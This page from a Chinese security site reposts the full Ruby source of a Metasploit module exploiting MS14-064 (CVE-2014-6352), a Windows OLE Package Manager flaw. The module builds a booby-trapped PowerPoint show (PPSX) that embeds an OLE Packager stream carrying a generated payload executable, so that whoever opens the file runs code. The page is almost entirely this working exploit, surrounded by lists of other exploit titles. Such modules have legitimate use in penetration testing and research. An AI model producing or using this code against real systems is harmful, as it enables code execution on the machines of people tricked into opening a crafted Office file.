首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MS14-064 Microsoft Windows OLE Package Manager Code Execution
来源:metasploit.com 作者:sinn3r 发布时间:2014-11-14  
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS14-064 Microsoft Windows OLE Package Manager Code Execution",
      'Description'    => %q{
        This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
        allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass.
        The Microsoft update tried to fix the vulnerability publicly known as "Sandworm". Platforms
        such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known
        to be vulnerable. However, based on our testing, the most reliable setup is on Windows
        platforms running Office 2013 and Office 2010 SP2. And please keep in mind that some other
        setups such as using Office 2010 SP1 might be less stable, and sometimes may end up with a
        crash due to a failure in the CPackage::CreateTempFileName function.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Haifei Li', # Vulnerability discovery
          'sinn3r', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2014-6352'],
          ['MSB', 'MS14-064'],
          ['BID', '70690'],
          ['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous']
        ],
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
          ['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Oct 21 2014",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx'])
      ], self.class)
  end

  def exploit
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    ole_stream = ole_packager
    zip = zip_ppsx(ole_stream)
    file_create(zip)
  end

  def zip_ppsx(ole_stream)
    zip_data = {}
    data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-6352', 'template_run_as_admin')

    Dir["#{data_dir}/**/**"].each do |file|
      unless File.directory?(file)
        zip_data[file.sub(data_dir,'')] = File.read(file)
      end
    end

    # add the otherwise skipped "hidden" file
    file = "#{data_dir}/_rels/.rels"
    zip_data[file.sub(data_dir,'')] = File.read(file)

    # put our own OLE streams
    zip_data['/ppt/embeddings/oleObject1.bin'] = ole_stream

    # create the ppsx
    ppsx = Rex::Zip::Archive.new
    zip_data.each_pair do |k,v|
      ppsx.add_file(k,v)
    end

    ppsx.pack
  end

  def ole_packager
    payload_name = "#{rand_text_alpha(4)}.exe"

    file_info = [2].pack('v')
    file_info << "#{payload_name}\x00"
    file_info << "#{payload_name}\x00"
    file_info << "\x00\x00"

    extract_info = [3].pack('v')
    extract_info << [payload_name.length + 1].pack('V')
    extract_info << "#{payload_name}\x00"

    p = generate_payload_exe
    file = [p.length].pack('V')
    file << p

    append_info = [payload_name.length].pack('V')
    append_info << Rex::Text.to_unicode(payload_name)
    append_info << [payload_name.length].pack('V')
    append_info << Rex::Text.to_unicode(payload_name)
    append_info << [payload_name.length].pack('V')
    append_info << Rex::Text.to_unicode(payload_name)

    ole_data = file_info + extract_info + file + append_info
    ole_contents = [ole_data.length].pack('V') + ole_data

    ole = create_ole("\x01OLE10Native", ole_contents)

    ole
  end

  def create_ole(stream_name, data)
    ole_tmp = Rex::Quickfile.new('ole')
    stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)

    stm = stg.create_stream(stream_name)
    stm << data
    stm.close

    directory = stg.instance_variable_get(:@directory)
    directory.each_entry do |entry|
      if entry.instance_variable_get(:@_ab) == 'Root Entry'
        # 0003000C-0000-0000-c000-000000000046 # Packager
        clsid = Rex::OLE::CLSID.new("\x0c\x00\x03\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
        entry.instance_variable_set(:@_clsId, clsid)
      end
    end

    # write to disk
    stg.close

    ole_contents = File.read(ole_tmp.path)
    ole_tmp.close
    ole_tmp.unlink

    ole_contents
  end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Internet Explorer OLE Automati
·MS14-064 Microsoft Windows OLE
·Internet Explorer OLE Automati
·MS14-064 Microsoft Windows OLE
·MS Office 2007 and 2010 - OLE
·ossec 2.8 Insecure Temporary F
·IP.Board 3.4.7 SQL Injection
·Safari 8.0 / OS X 10.10 - Cras
·Internet Explorer 8 MS14-035 U
·ZTE ZXHN H108L - Authenticatio
·Visual Mining NetCharts Server
·ZTE ZXHN H108L - Authenticatio
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved